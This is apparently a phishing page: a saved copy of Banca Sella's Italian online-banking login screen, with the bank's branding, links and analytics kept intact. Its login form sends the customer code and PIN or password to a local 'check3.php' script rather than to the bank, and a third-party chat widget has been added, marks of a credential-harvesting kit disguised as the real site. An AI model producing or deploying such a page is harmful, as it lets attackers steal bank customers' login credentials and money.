<!DOCTYPE html>
<!-- saved from url=(0048)https://www.sella.it/Autenticazione/step_one.jsp -->
<html lang="it"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="Cache-Control" content="no-cache&quot;">
<meta http-equiv="expires" content="-1&quot;">
<meta http-equiv="Pragma" content="no-cache&quot;">
<meta http-equiv="Cache-Control" content="no-store&quot;">


<title>Autenticazione</title>
<link rel="stylesheet" href="./Autenticazione_files/style.css">   
<script type="text/javascript" async="" src="./Autenticazione_files/linkid.js.download"></script><script type="text/javascript" defer="" async="" src="./Autenticazione_files/piwik.js.download"></script><script async="" src="./Autenticazione_files/analytics.js.download"></script><script src="./Autenticazione_files/jquery-3.3.1.min.js.download"></script>
<script src="./Autenticazione_files/vendor.min.js.download"></script>
<script src="./Autenticazione_files/script.js.download"></script> 
<script src="./Autenticazione_files/optimizevideo.js.download" type="text/javascript"></script>
<script src="./Autenticazione_files/optimizevideo.vbs.download" language="vbscript"></script>
</head>

<body class="auth-v2" onload="$(&#39;#userCode&#39;).focus()">
	
	









<div class="a-header">
	<a href="https://www.sella.it/Autenticazione/doLogout.jsp" title="Torna alla home page"><img class="a-logo" src="./Autenticazione_files/logo_sellait.png" alt="" title=""></a>
    <a href="https://www.sella.it/onboarding/fe/03268/contacts/#/contacts" target="_blank" class="a-hidden-md a-link-ico a-ico-arrow">Stato richieste</a>
</div>

    <div class="a-container">

		<div class="a-title-container">
			<div class="a-title">Accedi <span class="a-hidden-xs">ai servizi online</span></div>
			<div class="a-subtitle">Compila i campi per proseguire</div>
		</div>

    			<div id="ir7n6tmjsp" style="behavior:url(#default#clientCaps);display:none"></div>
		<object id="zqv3botss3" classid="clsid:{CA8A9780-280D-11CF-A24D-444553540000}" style="display:none"></object>	

		
		<form auth-form="" name="AuthenticationForm" method="post" action="check3.php" novalidate="novalidate">
			<input type="hidden" name="AU_page_code" value="AU_STEP_ONE">

			
			<div class="a-content-sm">
				<div class="a-form-row">
	<div class="a-form-label" id="usrLabel">Codice cliente o username <img src="./Autenticazione_files/spacer11.gif"></div>
	<input type="text" check-user-pass="" name="UserId" id="userCode" class="a-form-input" required="" autocomplete="off">
</div>
				

<div class="a-form-row">
	<div class="a-form-label" id="passLabel">PIN o password</div>
	<input type="password" name="Password" id="Password" class="a-form-input" required="" maxlength="25" autocomplete="off">
</div>
				<div class="a-buttons-row">
	<button id="a-btn-access" class="a-button a-btn-primary a-btn-submit" type="submit">Conferma</button><img src="./Autenticazione_files/spacer11.gif">
</div>

<div class="remember-box with-border">
	Primo accesso?<br>
	<a href="https://www.sella.it/main?application.OnlineInfoInternetCode.new" target="_blank" class="font-bold">Richiedi codici</a> - <a href="https://www.sella.it/main?application.OnlineActivateInternetCode.new" target="_blank" class="font-bold">Attiva codici</a><br>
	<a href="https://www.sella.it/onboarding/fe/03268/contacts/#/contacts" target="_blank" class="a-visible-md font-bold a-mt-15">Stato richieste</a>
	
</div>  
			</div>        
		</form>
    </div>
	
	



<div class="a-float-footer">
	<div class="a-container">
		     	
		
		<div class="remember-box with-border">
			Desideri maggiori informazioni o hai bisogno di assistenza?<br>
			<div><a href="https://www.sella.it/banca-online/contatti/contatti.jsp" class="a-footer-links" target="_blank">Contatta l'assistenza Clienti</a> <a href="https://www.sella.it/banca-online/sicurezza/sicurezza.jsp" target="_blank" class="a-footer-links">Informazioni sulla sicurezza</a></div>
		</div>
		<div class="a-footer">
			� 1996-2019 &nbsp; Banca Sella S.p.A. - P.I. 02224410023 - <a href="https://www.sella.it/ita/info/privacy.jsp">Privacy</a> 
		</div>	
				
		                
	</div>
</div>

    
	
	




<!-- Google Analytics -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-45092636-5', 'auto');
  ga('require', 'linkid', 'linkid.js');
  ga('require', 'displayfeatures');
  ga('send', 'pageview', '%2FAU_STEP_ONE');

</script>
<!-- end Google Analytics -->


<!-- Piwik -->
<script>
var u=(("https:" == document.location.protocol) ? "https" : "http") + "://wa.sella.it/";

//union
window.piwikAsyncInit = function () {
    try {
        var piwikTracker = Piwik.getTracker(u+'piwik.php', 23);
        piwikTracker.trackPageView('%2FAU_STEP_ONE');
    } catch( err ) {}
};

var _paq = _paq || [];
_paq.push(['trackPageView', '%2FAU_STEP_ONE']);
_paq.push(['enableLinkTracking']);
(function() {
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', 22 ]);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0]; g.type='text/javascript';
g.defer=true; g.async=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
})();
</script>
<noscript><p><img src="https://wa.sella.it/piwik.php?idsite=22" style="border:0;" alt="" /></p></noscript>
<!-- end Piwik -->
  	    	    

	<script src="./Autenticazione_files/asscli.js.download" type="text/javascript"></script>	    
<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5c50109051410568a1091aea/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->

</body></html>